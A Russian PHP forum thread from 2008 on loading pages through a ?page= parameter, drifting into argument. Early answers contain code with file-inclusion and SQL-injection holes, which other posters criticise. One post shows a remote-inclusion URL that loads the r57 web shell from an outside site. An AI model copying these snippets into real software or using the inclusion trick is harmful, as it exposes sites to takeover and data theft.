Модераторы: группа: Модератор, группа: Комодератор

Поиск:

Ответ в темуСоздание новой темы Создание опроса
> скрипт загрузки опред. страницы с помощью модуля 
:(
    Опции темы
ReactOS
Дата 25.3.2008, 16:33 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Бывалый
*

Привет всем!

На одном сайте http://ajax-93.ru
С помощью модуля page, загружается определенная страница, при переходе на не

К примеру, зайдем на Прайс:
http://ajax-93.ru/?page=2

?page=2 - загружается 2-а страница

Вопрос: "Как реализовать это?"
Пытался на ПХП.нет найти, не нашел :(

Хотел бы так же для своего личого сайта сделать и поизучать сам код!
Не дадите линк по этой теме?

Заранее спасибо!
PM   Вверх
awers
Дата 25.3.2008, 16:37 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Эксперт

Где: Россия, Таганрог

Вообще что то типа 
index.php
Код

<?php
$page = @$_GET['page']?$_GET['page']: 1;
include_once($_GET['page'].'.php');
?>

PM MAIL WWW ICQ Skype   Вверх
skyboy
Дата 25.3.2008, 16:40 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

неОпытный

Где: Днепропетровск

тут используется умолчание, принятое для web-серверов. если в каталоге имеется инжексный файл(какой - зависит от настроек web-сервера, зачастую, index.php), то можно пропускать имя файла.
т.е. если у них настроено так, что индексным файлом идет index.php, то ссылка "http://ajax-93.ru/?page=2" то же самое, что "http://ajax-93.ru/index.php?page=2"
Кроме того, возможно, там используется mod_rewrite. впрочем, сомневаюсь. с mod_rewrite'ом можно было бы и почитабельнее url сделать. например, "http://ajax-93.ru/price/"
PM MAIL   Вверх
Feldmarschall
Дата 25.3.2008, 16:44 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Новичок

awers, ты забыл про безопасность.

ReactOS, на самом деле, это бессмысленная "модульность", никакого смысла не имеющая.
точно так же можно написать вместо http://ajax-93.ru/?page=2 
http://ajax-93.ru/price.php
price.php - тот самый модуль.
получится короче, читабельнее и проще в реализации.

Это сообщение отредактировал(а) Feldmarschall - 25.3.2008, 16:51
PM   Вверх
ReactOS
Дата 25.3.2008, 16:53 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Бывалый
*

Цитата

awers, ты забыл про безопасность.

про это попрошу рассказать, почему небезопасно?  smile 

Цитата

ReactOS, на самом деле, это бессмысленная модульность, никакого смысла не имеющая

Ну хочется людям видеть
 http://ajax-93.ru/?page=2
А не:
 http://ajax-93.ru/price.php
глазу приятнее

Наверное, единсвтенный смысл в данной ситуации
PM   Вверх
Feldmarschall
Дата 25.3.2008, 17:12 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Новичок

Это заблуждение. Люди вообще не обращают внимание на адресную строку.
PM   Вверх
ReactOS
Дата 25.3.2008, 17:17 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Бывалый
*

Цитата

Это заблуждение. Люди вообще не обращают внимание на адресную строку

вряд ли, многие еще как обращают
иначе бы не делали такую бесмыльлицу, по вашим же словам

мне даже обидно стало за свой Сайт, хожу по Нету, что не сайт, так таким образом страницы грузят ?a=, ?page=, ?mod=

Это сообщение отредактировал(а) ReactOS - 25.3.2008, 17:19
PM   Вверх
Feldmarschall
Дата 25.3.2008, 17:24 (ссылка)   | (голосов:7) Загрузка ... Загрузка ... Быстрая цитата Цитата

Новичок

Так грузят страницы только ламеры.
А обидно должно быть не за ссылочки на сайте, а за то, что у него внутри.
Поэтому лучше учить язык, а не вешать на сайт рюшечки "как у всех".

PM   Вверх
awers
Дата 25.3.2008, 17:25 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Эксперт

Feldmarschall, мне кажется вопрос стоял в идеологии а не в безопасности. 

ReactOS, так же можно тянуть из БД - по ID к примеру
index.php
Код

<?php
$mysql = mysql_connect("host","root","pwd");
mysql_select_db("db");
$page = array_key_exists('page',$_GET)?$_GET['page']: 1;
$query = mysql_query("select FC_DATA from table where FK_ID = $page");
echo mysql_result($query,1);
?>

Добавлено @ 17:29
ReactOS, обрати внимание:

http://ajax-93.ru/?page=23
Код

Warning: main(content/.php) [function.main]: failed to open stream: No such file or directory in /www/ajax93/www/htdocs/tpl/second.php on line 5

Warning: main() [function.include]: Failed opening 'content/.php' for inclusion (include_path='/www/ajax93/www/htdocs/inc/PEAR:.:') in /www/ajax93/www/htdocs/tpl/second.php on line 5

Это говорит о том что: 
Код

<?php
$page = @$_GET['page']?$_GET['page']: 1;
if(file_exists($_GET['page'].'.php')){
}else{
echo "Нету такой страницы";
}
?>

Это сообщение отредактировал(а) awers - 25.3.2008, 17:32
Feldmarschall
Дата 25.3.2008, 17:29 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Новичок

Не понял.
Ты специально что ли?
Вместо одной кривизны втыкаешь другую. По-моему, сознательное вредительство не входит традиции этого форума. Или я ошибаюсь?

Вот именно. Вопрос был в идеологии, а не в готовом коде. Который здесь некоторые очень любят писать. Ну так если хочешь заработать себе плюсик, то будь добр писать код без заложенных в него  дыр в безопасности!

PM   Вверх
awers
Дата 25.3.2008, 17:32 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Эксперт

Feldmarschall, дык причем тут плюсики? Каждый должен продумывать все сам. Я показал человеку направление движения, указываю на ошибки что-бы человек понимал ситуацию а не просто тыкал чужой код. Я считаю что ты не прав.
ReactOS
Дата 25.3.2008, 17:32 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Бывалый
*

Цитата(Feldmarschall @ 25.3.2008,  17:24)

Распределил, млин. На ферме работаешь? Ламеров разводишь  smile 
Добрее быть не учился? Настоячиво советую уметь разговаривать с другими, даже если вопрос очень простой.
Правда, если бы ты был девушкой, такое поведение, наверное бы заводило  smile 

Спасибо awers, skyboy
Неспасибо фельду

ЗЫ
Коль, у тебя такие крутые яйца в ПХП, ответил бы сразу, как awers
Учись дружок поведению в обществе

Это сообщение отредактировал(а) ReactOS - 25.3.2008, 17:34
PM   Вверх
Feldmarschall
Дата 25.3.2008, 17:39 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Новичок

ReactOS
Будь добр воздержаться от оффтопика и перехода на личности.

awers
Плюсики при том, что этот форум ориентирован не на понимание, а на выклянчить готовый код, с плакатами  smile
И любая попытка заставить задуматься, понять свои действия, научить писать самому, вызывает жалобы модераторам и негативную реакцию этих самых модераторов. А готовый код, над которым думать не надо, вызывает всеобщую радость и плюсики. 
При этом, разумеется, заявления "Каждый должен продумывать все сам" - лицемерие. "Я дал ребенку спички, а что ими нельзя поджигать занавески - пусть думает сам!". Никто и никогда, получив готовый код, не будет задумываться. 
Поэтому, если уж решил осчастливить кого-то блюдечком с голубой каемочкой, то хотя бы позаботься, чтобы на этом блюдечке не лежала отрава.
PM   Вверх
awers
Дата 25.3.2008, 17:41 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Эксперт

Feldmarschall, обрати внимание на мой последний пост. Да, я учту твое мнение в дальнейшем
Feldmarschall
Дата 25.3.2008, 17:41 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Новичок

Тем более, что это совсем несложно. И у человека, который сам понимает, что он пишет, защита что от файловых, что от SQL инъекций вписывается автоматом.
А из-за такого кода, как у тебя, который так и лепят тыщи программеров, и идет слава о пхп, как о дырявом языке.
Но если за тыщи ламеров ты не в ответе, то хотя бы на профессиональном форуме можно подавать пример не ламерского отношения?

Это сообщение отредактировал(а) Feldmarschall - 25.3.2008, 17:42
PM   Вверх
bars80080
Дата 25.3.2008, 17:43 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

прапор творюет
Награды: 1

Где: Königsberg

Цитата(Feldmarschall @  25.3.2008,  16:24 Найти цитируемый пост)

а если на хосте htaccess вырублен, а сайт весь строится через index.php, то как без ламерства?
PM MAIL WWW   Вверх
Feldmarschall
Дата 25.3.2008, 17:45 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Новичок

awers, во-первых, то, что ты поправил для файлов - это полумера. все равно позволяет загрузить не тот файл, который ожидает программист. 
во-вторых, SQL инъекцию ты оставил без изменений.

Добавлено через 1 минуту и 51 секунду
bars80080, если ты объяснишь мне, зачем строить весь сайт через index.php при отключенном "htaccess", то я объясню тебе - как.
Только, плиз, без риторики "так все делают и мне хочеца"
PM   Вверх
awers
Дата 25.3.2008, 17:52 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Эксперт

Feldmarschall, хм. Мне выдать сразу под его PEAR работу с БД? там где байнд (bind) Я показал ОБЩИЙ смысл. Причем даже в самом первом посте я не сказал "на, пользуйся", я сказал "что-то типа того". Так же поздравляю со статусом Гуру ПХП, выдаю медаль и закрываю офтоп
flashaa
Дата 25.3.2008, 17:55 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Опытный
**

ReactOS, не пойму в чем крутизна ?page , ?mod. Крутизна - это ЧПУ. А стандартные ссылки либо на скрипт, либо на скрипт с параметрами (все это примеры URL), - вообщем-то основа веба, разница между ними будет собственно только тебе заметна.
PM MAIL   Вверх
ReactOS
Дата 25.3.2008, 17:56 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Бывалый
*

Цитата

так все делают и мне хочеца

когды человек видет, что-то более красивое, чем у него есть, он пытается сделать так, чтобы у него было так же - это раз

Цитата

bars80080, если ты объяснишь мне, зачем строить весь сайт через index.php при отключенном "htaccess", то я объясню тебе - как

лучше мне объясни, а еще желательно так разжевано, как я на 3д форуме статьи пишу

потом следует давать ответы и желательно с примерами а не разводить философию на пустом месте 

Это сообщение отредактировал(а) ReactOS - 25.3.2008, 17:59
PM   Вверх
bars80080
Дата 25.3.2008, 18:02 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

прапор творюет

Цитата(Feldmarschall @  25.3.2008,  16:45 Найти цитируемый пост)
bars80080, если ты объяснишь мне, зачем строить весь сайт через index.php при отключенном "htaccess", то я объясню тебе - как.

тупо удобно, коннект всего в одном месте, даже думать не нужно, это что касается строительства.
а htaccess вырублен по причине *** хостеров

объясняй
PM MAIL WWW   Вверх
Feldmarschall
Дата 25.3.2008, 18:03 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Новичок

awers, проблема в том, что для обеспечения элементарной безопасности не нужно быть Гуру ПХП. И не нужен PEAR.
Нужно всего лишь понимать смысл того, что ты делаешь.
Сделать basename() для файлов и intval() для id в базе - не суперзнания, чтобы так пафосно оправдываться.
Так что не надо прикрывать собственную неграмотность красивыми словами.
PM   Вверх
awers
Дата 25.3.2008, 18:05 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Эксперт

bars80080, а в чем проблема то с модреврайтом и коннектом в одном месте? у тебя же все всеравно на index.php редиректиться (к примеру), но способ получения ?page другой
Feldmarschall
Дата 25.3.2008, 18:05 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Новичок

bars80080, ты правда думаешь, что если на сайте два скрипта - price.php и catalog.php, то в них обоих коннект пишут?
PM   Вверх
awers
Дата 25.3.2008, 18:08 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Эксперт

Feldmarschall, как жаль что ты не слышишь моих слов. Время = деньги. Я свое время берегу, но несмотря на это, я нахожу время для помощи людям на этом форуме. Мой опыт показал что для начала надо узнать принцип, а безопасность и прочее надо в любом случае самому под контроль брать. Я никогда не пользовался не задумываясь чужим кодом. Сам все проверял и тестировал. По этому я считаю что я дал вполне нормальный ответ на вопрос. Оправдываться мне ненужно и незачто. Я человеку помог, он это уже сделал и все у него хорошо )

Добавлено через 35 секунд
Feldmarschall, ну может человек об include('db_connect.php'); не подумал )
bars80080
Дата 25.3.2008, 18:14 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

прапор творюет

awers, вопрос не в том, главнокомандующий заявил что: 
Цитата(Feldmarschall @  25.3.2008,  16:24 Найти цитируемый пост)
 на слова 
Цитата(ReactOS @  25.3.2008,  16:17 Найти цитируемый пост)
мне даже обидно стало за свой Сайт, хожу по Нету, что не сайт, так таким образом страницы грузят ?a=, ?page=, ?mod=

я и спросил: 
Цитата(bars80080 @  25.3.2008,  16:43 Найти цитируемый пост)
а если на хосте htaccess вырублен, а сайт весь строится через index.php, то как без ламерства? 
 это чтобы искать не пришлось

Цитата(Feldmarschall @  25.3.2008,  17:05 Найти цитируемый пост)
bars80080, ты правда думаешь, что если на сайте два скрипта - price.php и catalog.php, то в них обоих коннект пишут? 
 почему в них? в index.php include к ним
но в отличие от вас многоуважаемый главнокомандующий, я не претенедую на звание гуру пхп, поэтому, если просвятите меня в чём-то, я буду только рад
PM MAIL WWW   Вверх
awers
Дата 25.3.2008, 18:18 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Эксперт

Feldmarschall, если уже заговорили о безопасности - тут можно такую демогогию развести, начиная от заведения allowed_files, preg_mach (allowed_pattern) и т.д. есть такое понятие как минимализм. 
bars80080, точно ) я просто непонял
ReactOS
Дата 25.3.2008, 18:21 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Бывалый
*

Цитата

но в отличие от вас многоуважаемый главнокомандующий, я не претенедую на звание гуру пхп, поэтому, если просвятите меня в чём-то, я буду только рад

меня тоже желательно просвятить в тонкости магии на ПХП, о главнокомандующий
PM   Вверх
awers
Дата 25.3.2008, 18:22 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Эксперт

и еще я предлогаю прекратить дескутировать (фотопить). человеку помощь уже оказана, если хотим поговорить - есть PM

smile 
ReactOS
Дата 25.3.2008, 19:06 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Бывалый
*

Код

include_once $_SERVER['DOCUMENT_ROOT'] . "./connect.php";

// Если page не найдена, открываем "Главная"
$page_id = isset($_GET['page']) ? (int)$_GET['page'] : 1; // default = Главная
$page_id = ($page_id > 0) ?  $page_id : 1;

$url =& new Url();
$url->add(array('page'=>$page_id));

// Получаем названия основных разделов
$page_list = get_page_list();

// берём контент выбранной страницы из базы
$page_info = get_page_details($page_id);

Тогда уж так получается

И  фельду на заметку
1). Не делите на касты людей, а еще с пеной у рта, чуть ли не в каждое сообщение добавляете слово "ламер" (не только в этой теме, а если это уже система, скорее всего на навязчивую идею похоже)
2). Везде есть более сильные в чем-то, чем другие люди. Если вы Дизайном и 3д не занимаетеь, представьте, вы зайдете в раздел по 3д-моделлингу, я вам ярлык ламера навешу, понравится? Наверное нет, поэтому учитесь быть дипломатичным.
3). Берите пример с awers, дал пример и разъобснил, в отличии от вас, не стал заниматься демогогией.

Это сообщение отредактировал(а) ReactOS - 25.3.2008, 19:08
PM   Вверх
Smith
Дата 25.3.2008, 20:55 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Шустрый
*

Цитата(Feldmarschall @ 25.3.2008,  17:24)

хм, а грузить файлы вида http://site/file.php это нормально? давайте тогда уже просто на html сайты писать... не вижу ничего ламерского в модульной системе сайта, ИМХО, самая рациональная
PM MAIL   Вверх
skyboy
Дата 26.3.2008, 00:57 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

неОпытный

Цитата(Smith @  25.3.2008,  19:55 Найти цитируемый пост)
хм, а грузить файлы вида http://site/file.php это нормально?

что имеется в виду?
обращение к файлу file.php чем-то неугодно?
PM MAIL   Вверх
skyboy
Дата 26.3.2008, 00:57 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

неОпытный

Тема перемещена во флейм.
PM MAIL   Вверх
Smith
Дата 26.3.2008, 10:40 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Шустрый
*

Цитата(skyboy @ 26.3.2008,  00:57)
Цитата(Smith @  25.3.2008,  19:55 Найти цитируемый пост)
хм, а грузить файлы вида http://site/file.php это нормально?

что имеется в виду?
обращение к файлу file.php чем-то неугодно?

подключением функций, использующихся по всему сайту. легче объявить в index init.php, который подключает используемые классы и ф-ции, чем носить за собой в каждый файл подключение всего
PM MAIL   Вверх
Shaggie
Дата 26.3.2008, 11:54 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Опытный
**

Где: outer space

Цитата(skyboy @  26.3.2008,  00:57 Найти цитируемый пост)
Тема перемещена во флейм.

Ну и нафиг она нам тут сдалась, а? Слишком мало качественного бреда.

--------------------
Цитата(alina3000 @  6.3.2014,  10:47 Найти цитируемый пост)
Сорри что не по теме 
PM MAIL ICQ GTalk Jabber   Вверх
skyboy
Дата 26.3.2008, 12:18 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

неОпытный

Shaggie, да, это я зря.

PM MAIL   Вверх
gambit
Дата 26.3.2008, 13:02 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Эксперт

Где: я?

skyboy
Shaggie, а почему у вас аватарки одинаковые??? Я тему читал, подумал человек сам с собой разговаривает.
PM MAIL ICQ Skype   Вверх
Shaggie
Дата 26.3.2008, 13:33 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Опытный
**

gambit, я раз-зговариваю сам с-с-с-с-собой, да, моя прелес-с-сть...

Добавлено через 1 минуту и 11 секунд
На самом деле мы назгулы! Присоединись или умри от потери мотивации smile 

--------------------
Сорри что не по теме 
bars80080
Дата 26.3.2008, 16:36 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

прапор творюет

вот так всегда, а я думал уже удастся главнокомандующего на пользу развести,

а теме пинок...
PM MAIL WWW   Вверх
Shaggie
Дата 27.3.2008, 07:00 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Опытный
**

Цитата(bars80080 @  26.3.2008,  16:36 Найти цитируемый пост)
а я думал уже удастся главнокомандующего на пользу развести,

Да ладно тебе, просто товарищ - перфекционист. Добрый джинн, который хочет спасти окружающих от набивания шишек и провести правильной тропой к светлому будущему, не понимая однако, что думать просто так научиться нельзя - нужны ещё и простые, доступные для понимания примеры кода, и набитые собственноручно шишки.

Однажды он или перевоспитается (просто надоест встревать и учить каждого новичка сразу всему), или опять по голове от модераторов получит.

--------------------
Сорри что не по теме 
bars80080
Дата 27.3.2008, 13:08 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

прапор творюет

так мне ж на самом деле интересно

вот главнокомандующий травит, де так плохо, так нельзя, а так вообще сломается
вот и хочется узнать где, что и почему

использует ли сам главком или кто-нибудь другой так же через один index, или у него какие-то свои хитрые схемы
если нет, то почему и как, и почему опять же!

к примеру, я сейчас остановился именно на такой схеме, и лучшего не вижу

PM MAIL WWW   Вверх
Shaggie
Дата 27.3.2008, 14:14 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Опытный
**

Цитата(bars80080 @  27.3.2008,  13:08 Найти цитируемый пост)
вот и хочется узнать где, что и почему

Да на эту тему копий поломатых не счесть. И сторонников загрузки всех страниц через шаблон index.php много, и противников. И аргументы у всех достаточно весомые!

Товарищ Feldmarschall, похоже, оказался ярым приверженцем ReST архитектуры. Похвально, конечно, но можно было и кодом, и делом продемонстрировать светлую силу, а не только разговорами и убеждением. Вон как товарищ tar729729 распинается - ну истинный мастер! А всё одно, на теории далеко укатить не может.

--------------------
Сорри что не по теме 
ReactOS
Дата 27.3.2008, 15:33 (ссылка)    | (голосов:1) Загрузка ... Загрузка ... Быстрая цитата Цитата

Бывалый
*

Цитата

Похвально, конечно, но можно было и кодом, и делом продемонстрировать светлую силу, а не только разговорами и убеждением.

Вот как раз от него этого и требовали, а не разводить философию на пустом месте!
Пинок фельду!
PM   Вверх
bars80080
Дата 27.3.2008, 16:26 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

прапор творюет

Цитата(Shaggie @  27.3.2008,  13:14 Найти цитируемый пост)
Да на эту тему копий поломатых не счесть. И сторонников загрузки всех страниц через шаблон index.php много, и противников

вот честно говоря не знаю как правильно вопрос задать, чтобы почитать статью на эту тему
/хотелось бы не просто спор/
и не только ReST, но ещё, как сказать сравниловку.

к примеру, стал искать по шаблонам (зачем они нужны, как делаются), нашёл хорошую статью, где расписывалось аж пять методов ентой шаблонизации

а по этому вопросу как? как его сформулировать? "базовая система построения сайта"?
PM MAIL WWW   Вверх
SneG0K
Дата 28.3.2008, 14:28 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Max Mara

Где: Wis Dells

Код

<?php
?>

Этот код не безопасен потому, что можно легко передать допустим следующее
Код

index.php?file=http://site.com/r57shell
И загрузится вместо нужной страницы загрузится файл r57shell.php ... Блин, забыл как он называется... Короче, этот тип уязвимости называется PHP-Injection ... Конешно если в настройках php.ini (не помню какой параметр и чему он равен smile ) есть, то загрузить с другого сервера не получится. и если не сработает NULL баг, замеченыый в третих версиях пхп, тогда эта дырка не имеет большой опасности. 

З.Ы. Но чаще всего использую базу данных) 

З.З.Ы. 
Feldmarschall хватит из себя строить супер мена, ты такой же как и мы!!! и ничем не лучше!
PM WWW Skype   Вверх
FelikZ
Дата 29.3.2008, 00:15 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата

Старый Маразматик
**

Где: Vault 13

а что эта тема во флейме забылаsmile?

--------------------
user posted image
PM WWW ICQ Skype   Вверх
Ответ в темуСоздание новой темы Создание опроса
Правила форума "Флейм"
Тут модерируют вообще все кому не лень!

Это "Песочница"!!!

В разделе не действуют многие правила:

• Можно оффтопить
  • Можно флудить, но не увлекаться
  • Можно общаться на темы, не только связанные с программированием.
  • Если вы поставили здесь адекватный вопрос, не ждите адекватного ответа.

Строго запрещено:

• Размещать рекламу
  • Обсуждать политику
  • Оскорблять друг-друга и переходить на личности
  • Наезжать
  • Материться
  • Уныло обсуждать унылые вещи

Напоминаем о существовании волшебной кнопочки Репорт. Если вы увидели сообщение, несовместимое с жизнью, просьба подвести на нее курсор и клацнуть левой клавишей мышки. Тем самым вы сможете призвать злого, но жутко справедливого джинна-модератора, который нашлет порчу на злостного нарушителя. Кстати - счётчик сообщений здесь не растёт.

Глас Винграда:

Лучшее в Камасутре - это введение!

Если Вам понравилась атмосфера форума, заходите к нам чаще! С уважением, Все кому не лень.

1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей)
0 Пользователей:
« Предыдущая тема | Песочница | Следующая тема »

[ Время генерации скрипта: 0.1802 ]   [ Использовано запросов: 20 ]   [ GZIP включён ]

Реклама на сайте     Информационное спонсорство

По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности     Powered by Invision Power Board(R) 1.3 © 2003  IPS, Inc.